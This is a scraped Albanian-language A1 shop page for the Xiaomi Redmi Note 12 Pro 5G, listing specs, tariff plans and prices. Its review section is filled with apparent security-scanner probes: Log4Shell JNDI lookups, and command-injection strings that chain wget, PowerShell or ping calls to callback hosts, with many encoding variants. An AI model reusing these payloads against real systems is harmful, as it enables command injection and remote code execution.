Xiaomi Redmi Note 12 Pro 5G 6/128

Xiaomi Redmi Note 12 Pro 5G, ku inovacioni takohet me përballueshmërinë. Me ekuilibër të përsosur të veçorive, ky smartfon është i pajisur me 6 GB RAM dhe një hapësirë të gjerë 128 GB memorje të brendshme, e cila siguron përmbushjen e shpejtë të shumë detyrave dhe hapësirë të mjaftueshme për të gjithë përmbajtjen tuaj. Pajisja krenohet me një dizajn të shkëlqyeshëm që është i rehatshëm për t'u mbajtur falë stilit të tij, dhe ekrani i tij mahnitës i jep jetë pamjes me ngjyra të gjalla dhe detaje të mprehta. Sistemi i avancuar i kamerës i Redmi Note 12 Pro 5G kap momentet me qartësi, edhe në kushte sfiduese ndriçimi.

Lexo më shumë
6 GB / 128 GB
6.67" FHD+ Flow AMOLED, 120Hz
50+8+2MP rear + 16MP front
Octa-core
5000 mAh
Sasi të kufizuara
Në dispozicion
Nuk është në dispozicion onlajn
6 GB / 128 GB
6.67" FHD+ Flow AMOLED, 120Hz
50+8+2MP rear + 16MP front
Octa-core
5000 mAh
Ngjyrën: Onyx Black

Në dispozicion në sasi të kufizuara

Në dispozicion

Nuk është në dispozicion onlajn

Tarifa
A1 Ultra M
Ndrysho tarifën
1.199 den./muaj
Mënyra e pagesës
Me tarif� t� nj�hershme prej 199 den. p�r pajisje me k�ste
Çmimi i pajisjes

549 den. x 24 muaj

Tarifa: A1 Ultra M
1.199 den./muaj
Çmimi

549 den. x 24 muaj

Transporti falas

A dëshironi të dini kur do të ketë në dispozicion

Sasi të kufizuara
Në dispozicion
Nuk është në dispozicion onlajn

A1 Ultra XS

549 den./muaj

Tarifa e rekomanduar
 
 
6GB
 
internet kombëtar 
 
 
  
  
Pakufizuar
 
minuta kombëtare 
  
 
 
  
  
Screen Insurance
 
1 muaj falas
 
  

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

841 den. x 24 muaj
Zgjidhni

A1 Ultra S

999 den./muaj

Tarifa e rekomanduar
 
 
60GB
 
internet kombëtar 
A1 Net Sef
 
deri më 50GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
Screen Insurance
 
1 muaj falas
 
  

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

674 den. x 24 muaj
Zgjidhni

A1 Ultra M

1.199 den./muaj

Tarifa e rekomanduar
5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
Screen Insurance
 
3 muaj falas
 
  

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

549 den. x 24 muaj
E zgjedhur

A1 Ultra L

1.399 den./muaj

Tarifa e rekomanduar
5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
50 minuta
 
biseda jashtë vendit 
  
Screen Insurance
 
6 muaj falas
 
  

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

341 den. x 24 muaj
Zgjidhni

A1 Ultra XL

1.699 den./muaj

Tarifa e rekomanduar
5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 200GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
100 minuta
 
biseda jashtë vendit 
  
Screen Insurance
 
12 muaj falas
 
  

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

133 den. x 24 muaj
Zgjidhni
Zgjidhni tarifën
Kthimi i produktit
Dorëzim falas
Gjithmon në përfiti
Pagesë e sigurtë

Xiaomi Redmi Note 12 Pro 5G 6/128

Çmimi i pajisjes dhe tarifa
Tarifa
Kohëzgjatja e kontratës
Mënyra e pagesës
Me tarif� t� nj�hershme prej 199 den. p�r pajisje me k�ste

A1 Ultra XS

549 den./muaj

Tarifa e rekomanduar
 
 
6GB
 
internet kombëtar 
 
 
  
  
Pakufizuar
 
minuta kombëtare 
  
 
 
  
  
Screen Insurance
 
1 muaj falas
 
  

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

841 den. x 24 muaj
Zgjidhni

A1 Ultra S

999 den./muaj

Tarifa e rekomanduar
 
 
60GB
 
internet kombëtar 
A1 Net Sef
 
deri më 50GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
Screen Insurance
 
1 muaj falas
 
  

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

674 den. x 24 muaj
Zgjidhni

A1 Ultra M

1.199 den./muaj

Tarifa e rekomanduar
5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
Screen Insurance
 
3 muaj falas
 
  

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

549 den. x 24 muaj
E zgjedhur

A1 Ultra L

1.399 den./muaj

Tarifa e rekomanduar
5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
50 minuta
 
biseda jashtë vendit 
  
Screen Insurance
 
6 muaj falas
 
  

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

341 den. x 24 muaj
Zgjidhni

A1 Ultra XL

1.699 den./muaj

Tarifa e rekomanduar
5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 200GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
100 minuta
 
biseda jashtë vendit 
  
Screen Insurance
 
12 muaj falas
 
  

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

133 den. x 24 muaj
Zgjidhni

A1 Senior

299 den./muaj

Tarifa e rekomanduar
 
 
500MB
 
internet kombëtar 
Pakufi
 
Minuta drejt A1 
  
50
 
Minuta drejt rrjeteve tjera 
kombëtare (fikse/cel.) 
50
 
SМЅ drejt të gjitha 
rrjeteve kombëtare 

Çmimi për Xiaomi Redmi Note 12 Pro 5G 6/128

/
Basic price
21.999denarë
Pripejd
23.999denarë
Çmimi vetëm për pajisjen
23.999denarë

Xiaomi Redmi Note 12 Pro 5G, ku inovacioni takohet me përballueshmërinë. Me ekuilibër të përsosur të veçorive, ky smartfon është i pajisur me 6 GB RAM dhe një hapësirë të gjerë 128 GB memorje të brendshme, e cila siguron përmbushjen e shpejtë të shumë detyrave dhe hapësirë të mjaftueshme për të gjithë përmbajtjen tuaj. Pajisja krenohet me një dizajn të shkëlqyeshëm që është i rehatshëm për t'u mbajtur falë stilit të tij, dhe ekrani i tij mahnitës i jep jetë pamjes me ngjyra të gjalla dhe detaje të mprehta. Sistemi i avancuar i kamerës i Redmi Note 12 Pro 5G kap momentet me qartësi, edhe në kushte sfiduese ndriçimi.

Xiaomi Redmi Note 12 Pro 5G 6/128

Çka ka në kuti?
  • Xiaomi Redmi Note 12 Pro 5G
  • Адаптер
  • Кабел за полнење
  • Упатство за употреба
  • Гарантен лист
Karakteristikat themelore
  • 6 GB / 128 GB
  • 6.67" FHD+ Flow AMOLED, 120Hz
  • 50+8+2MP rear + 16MP front
  • Octa-core
  • 5000 mAh
162.9767.9 mm
Karakteristikat e hollësishme
Rrjeti GSM/HSPA/LTE/5G
Lloji i SIM Dual Nano SIM
Ekrani FHD+ Flow AMOLED, 120Hz
Madhësia e ekranit 6.67”
Kamera 50+8+2MP
Sistemi operativ Android
CPU Octa-core
Memorja e integruar 128 GB
RAM memorja 6 GB
Bateria Li-Po 5000 mAh
Menyja në maqedonisht Yes
Telefoni punon vetëm me A1 SIM kartelë No
Kamera e përparme 16MP
Dimensionet 162.9 × 76 × 7.9 mm
Pesha 187g
Garancia 24

Xiaomi Redmi Note 12 Pro 5G 6/128

Garancia dhe servisi
24
muajgarancia e prodhuesit
Servisues i autorizuar për këtë pajisje

Nëse keni nevojë për servis për Xiaomi Redmi Note 12 Pro 5G 6/128, kontaktoni servisuesin e autorizuar.

Xiaomi Redmi Note 12 Pro 5G 6/128

Vlerësimi nga shfrytëzuesit

Ka gjithsej 94 recenzione për këtë pajisje

94
0
0
0
0
5
${jndi:ldap://v3-ping-2943-c4987b50-80f0-4d85-919b-47f4acf22782.securityip.appsechcl.com/foo}
07.02.2024

A Ju ndihmoi ky recenzion?
'wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40319%23
06.02.2024

A Ju ndihmoi ky recenzion?
&& ping -c 1 v3-ping-40308-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

A Ju ndihmoi ky recenzion?
%26%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2864
07.02.2024

A Ju ndihmoi ky recenzion?
powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40324
06.02.2024

A Ju ndihmoi ky recenzion?
"powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2902#
07.02.2024

A Ju ndihmoi ky recenzion?
%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40305
06.02.2024

A Ju ndihmoi ky recenzion?
|| ping -c 1 v3-ping-2903-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

A Ju ndihmoi ky recenzion?
%5C%22wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2872%23
07.02.2024

A Ju ndihmoi ky recenzion?
%7C%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2866
07.02.2024

A Ju ndihmoi ky recenzion?
%60wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40309%60
06.02.2024

A Ju ndihmoi ky recenzion?
%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2857
07.02.2024

A Ju ndihmoi ky recenzion?
v3-ping-3096-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

A Ju ndihmoi ky recenzion?
http://@v3-ping-40639-e024b531-27de-4400-a8f4-16959077bb30.securityip.appsechcl.com
06.02.2024

A Ju ndihmoi ky recenzion?
&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40307
06.02.2024

A Ju ndihmoi ky recenzion?
${jndi:ldap://v3-ping-40390-f030e6c0-73dc-4ce6-ab26-23c2848ea8fb.securityip.appsechcl.com/foo}
06.02.2024

A Ju ndihmoi ky recenzion?
'powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40351#
06.02.2024

A Ju ndihmoi ky recenzion?
%3E(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40321)
06.02.2024

A Ju ndihmoi ky recenzion?
$(ping -c 1 v3-ping-2920-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

A Ju ndihmoi ky recenzion?
)(ping -c 1 v3-ping-40376-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

A Ju ndihmoi ky recenzion?
06.02.2024

A Ju ndihmoi ky recenzion?
http://@v3-ping-3098-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

A Ju ndihmoi ky recenzion?
| ping -c 1 v3-ping-2887-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

A Ju ndihmoi ky recenzion?
)(ping -c 1 v3-ping-2924-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

A Ju ndihmoi ky recenzion?
<(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40360)
06.02.2024

A Ju ndihmoi ky recenzion?
${jndi:ldap://v3-ping-2945-c4987b50-80f0-4d85-919b-47f4acf22782.securityip.appsechcl.com/foo}
07.02.2024

A Ju ndihmoi ky recenzion?
)(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2914)
07.02.2024

A Ju ndihmoi ky recenzion?
07.02.2024

A Ju ndihmoi ky recenzion?
|powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40299
06.02.2024

A Ju ndihmoi ky recenzion?
>(ping -c 1 v3-ping-40352-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

A Ju ndihmoi ky recenzion?
v3-ping-40636-e024b531-27de-4400-a8f4-16959077bb30.securityip.appsechcl.com
06.02.2024

A Ju ndihmoi ky recenzion?
'wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2874%23
07.02.2024

A Ju ndihmoi ky recenzion?
%60wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2861%60
07.02.2024

A Ju ndihmoi ky recenzion?
||powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2894
07.02.2024

A Ju ndihmoi ky recenzion?
%5C%22wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40317%23
06.02.2024

A Ju ndihmoi ky recenzion?
' ping -c 1 v3-ping-2909-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com #
07.02.2024

A Ju ndihmoi ky recenzion?
"powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40343#
06.02.2024

A Ju ndihmoi ky recenzion?
06.02.2024

A Ju ndihmoi ky recenzion?
%3C(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40325)
06.02.2024

A Ju ndihmoi ky recenzion?
|| ping -c 1 v3-ping-40329-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

A Ju ndihmoi ky recenzion?
;powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40330
06.02.2024

A Ju ndihmoi ky recenzion?
<(ping -c 1 v3-ping-2915-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

A Ju ndihmoi ky recenzion?
|powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2853
07.02.2024

A Ju ndihmoi ky recenzion?
%3Bwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2856
07.02.2024

A Ju ndihmoi ky recenzion?
" ping -c 1 v3-ping-40335-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com #
06.02.2024

A Ju ndihmoi ky recenzion?
'powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2905#
07.02.2024

A Ju ndihmoi ky recenzion?
http://0x000A.0x000000.0x002.0x000000F:55229/AppScanMsg.html?varId=40604
06.02.2024

A Ju ndihmoi ky recenzion?
&& ping -c 1 v3-ping-2879-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

A Ju ndihmoi ky recenzion?
&&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2878
07.02.2024

A Ju ndihmoi ky recenzion?
%3C(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2877)
07.02.2024

A Ju ndihmoi ky recenzion?
%3Bwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40296
06.02.2024

A Ju ndihmoi ky recenzion?
& ping -c 1 v3-ping-2870-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

A Ju ndihmoi ky recenzion?
http://v3-ping-3097-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

A Ju ndihmoi ky recenzion?
; ping -c 1 v3-ping-2896-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

A Ju ndihmoi ky recenzion?
24.12.2023

A Ju ndihmoi ky recenzion?
;powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2890
07.02.2024

A Ju ndihmoi ky recenzion?
22.11.2023

A Ju ndihmoi ky recenzion?
)(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40367)
06.02.2024

A Ju ndihmoi ky recenzion?
%3E(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2875)
07.02.2024

A Ju ndihmoi ky recenzion?
>(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40354)
06.02.2024

A Ju ndihmoi ky recenzion?
06.02.2024

A Ju ndihmoi ky recenzion?
ping -c 1 v3-ping-2863-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com
07.02.2024

A Ju ndihmoi ky recenzion?
ping -c 1 v3-ping-40303-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

A Ju ndihmoi ky recenzion?
>(ping -c 1 v3-ping-2913-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com)
07.02.2024

A Ju ndihmoi ky recenzion?
" ping -c 1 v3-ping-2907-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com #
07.02.2024

A Ju ndihmoi ky recenzion?
07.02.2024

A Ju ndihmoi ky recenzion?
& ping -c 1 v3-ping-40306-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

A Ju ndihmoi ky recenzion?
>(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2908)
07.02.2024

A Ju ndihmoi ky recenzion?
http://v3-ping-40638-e024b531-27de-4400-a8f4-16959077bb30.securityip.appsechcl.com
06.02.2024

A Ju ndihmoi ky recenzion?
07.02.2024

A Ju ndihmoi ky recenzion?
&&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40315
06.02.2024

A Ju ndihmoi ky recenzion?
<(ping -c 1 v3-ping-40362-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

A Ju ndihmoi ky recenzion?
${jndi:ldap://v3-ping-40395-f030e6c0-73dc-4ce6-ab26-23c2848ea8fb.securityip.appsechcl.com/foo}
06.02.2024

A Ju ndihmoi ky recenzion?
&powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2862
07.02.2024

A Ju ndihmoi ky recenzion?
06.02.2024

A Ju ndihmoi ky recenzion?
12.01.2024

A Ju ndihmoi ky recenzion?
%26%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40310
06.02.2024

A Ju ndihmoi ky recenzion?
%26wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2859
07.02.2024

A Ju ndihmoi ky recenzion?
; ping -c 1 v3-ping-40320-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

A Ju ndihmoi ky recenzion?
||powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=40334
06.02.2024

A Ju ndihmoi ky recenzion?
07.02.2024

A Ju ndihmoi ky recenzion?
' ping -c 1 v3-ping-40342-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com #
06.02.2024

A Ju ndihmoi ky recenzion?
$(ping -c 1 v3-ping-40364-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com)
06.02.2024

A Ju ndihmoi ky recenzion?
%7C%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40311
06.02.2024

A Ju ndihmoi ky recenzion?
`ping -c 1 v3-ping-2921-ec588800-fa0e-4ffd-b406-2ea8a41db71b.securityip.appsechcl.com`
07.02.2024

A Ju ndihmoi ky recenzion?
<(powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2910)
07.02.2024

A Ju ndihmoi ky recenzion?
$(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D2871)
07.02.2024

A Ju ndihmoi ky recenzion?
%7Cwget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40300
06.02.2024

A Ju ndihmoi ky recenzion?
http://0x000A.0x000000.0x002.0x000000F:55229/AppScanMsg.html?varId=3078
07.02.2024

A Ju ndihmoi ky recenzion?
powershell -command Invoke-WebRequest http://10.0.2.15:55229/AppScanMsg.html?varId=2883
07.02.2024

A Ju ndihmoi ky recenzion?
wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40295
06.02.2024

A Ju ndihmoi ky recenzion?
$(wget%20http%3A%2F%2F10.0.2.15%3A55229%2FAppScanMsg.html%3FvarId%3D40316)
06.02.2024

A Ju ndihmoi ky recenzion?
`ping -c 1 v3-ping-40370-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com`
06.02.2024

A Ju ndihmoi ky recenzion?
| ping -c 1 v3-ping-40314-49037676-c4d2-46a8-8e51-717949c0396f.securityip.appsechcl.com
06.02.2024

A Ju ndihmoi ky recenzion?